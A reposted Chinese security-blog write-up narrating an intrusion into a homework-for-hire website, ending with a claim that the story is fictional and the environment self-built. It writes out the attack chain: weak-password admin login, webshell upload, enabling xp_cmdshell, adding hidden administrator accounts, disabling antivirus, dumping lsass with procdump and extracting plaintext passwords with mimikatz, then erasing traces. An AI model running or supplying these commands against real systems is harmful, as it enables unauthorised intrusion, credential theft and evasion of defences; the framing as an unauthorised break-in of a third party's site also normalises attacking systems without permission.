记一次有趣的渗透测试
2022-12-30 00:6:38 Author: 橘猫学安全(查看原文) 阅读量:26 收藏

文章来源:先知社区(我想学安全)

原文地址:https://xz.aliyun.com/t/5646

0x01 前言
别人都放假了我们却还在小学期中,这两天女朋友老是抱怨小学期作业难做,然后她今天发现淘宝上有人花钱代做,遂发来网址让我看看,咱也不知道,咱也不敢问!
0x02 正文
然后反手一个弱口令进了后台。
其实这个站有注入,不过既然进了后台,那肯定要去shell啊,找了个学生的账号登陆进入发现了头像上传点可以任意文件上传。
直接传了个大马,执行命令看下权限
这权限也太小了吧,先来提权,看下补丁
这还不随便打了,传了几个提权exe之后发现都执行不了,可能被杀软杀掉了,然后尝试抓hash
看来只有pwdump7.exe没被杀了,但是权限不够
现在我们的权限能去读一些文件,去翻一翻sqlserver的密码,尝试sqlserver来提权
开启xp_cmdshell
exec sp_configure 'show advanced options', 1;reconfigure;exec sp_configure 'xp_cmdshell',1;reconfigure;
成了,有权限了,尝试加个管理员?
exec master..xp_cmdshell 'net user test pinohd123. /add'    添加用户test,密码testexec master..xp_cmdshell 'net localgroup administrators test add'    添加test用户到管理员组
加不上啊,杀软拦了,再次使用pwdump7来抓hash
本来就开着3389,直接连上去
开着管家和金山,传的东西都被拦截了,关掉杀软,先加个隐藏用户
net user test$ pinohd123. /addnet localgroup administrators test$ add
这里lz1y告诉我也可以procdump去搞,procdump是官方的工具,不会被杀软杀
exec master..xp_cmdshell 'xxxx\images\button\Procdump.exe -accepteula -ma lsass.exe -o xxx.dmp'
把2.dmp存到本来来配合mimikatz
mimikatz.exesekurlsa::minidump 2.dmpsekurlsa::logonPasswords full
同样拿到明文。奈何没有域,擦了脚印溜了。
好了;以上问题纯属虚构,环境也是自己搭的。(告辞
如有侵权,请联系删除

推荐阅读

实战|记一次奇妙的文件上传getshell
「 超详细 | 分享 」手把手教你如何进行内网渗透
神兵利器 | siusiu-渗透工具管理套件
一款功能全面的XSS扫描器
实战 | 一次利用哥斯拉马绕过宝塔waf
BurpCrypto: 万能网站密码爆破测试工具
快速筛选真实IP并整理为C段 -- 棱眼
自动探测端口顺便爆破工具t14m4t
渗透工具|无状态子域名爆破工具(1秒扫160万个子域)
查看更多精彩内容,还请关注橘猫学安全:
每日坚持学习与分享,觉得文章对你有帮助可在底部给点个“再看

文章来源: http://mp.weixin.qq.com/s?__biz=Mzg5OTY2NjUxMw==&mid=2247502709&idx=1&sn=2a415d1dd4898dbf2bbe9c11b3940011&chksm=c04d4c4bf73ac55dddf6835306c7ea371f2ce13e2c4cf7f2b5ccb92e6a40d77834e51424ffd5#rd
如有侵权请联系:admin#unsafe.sh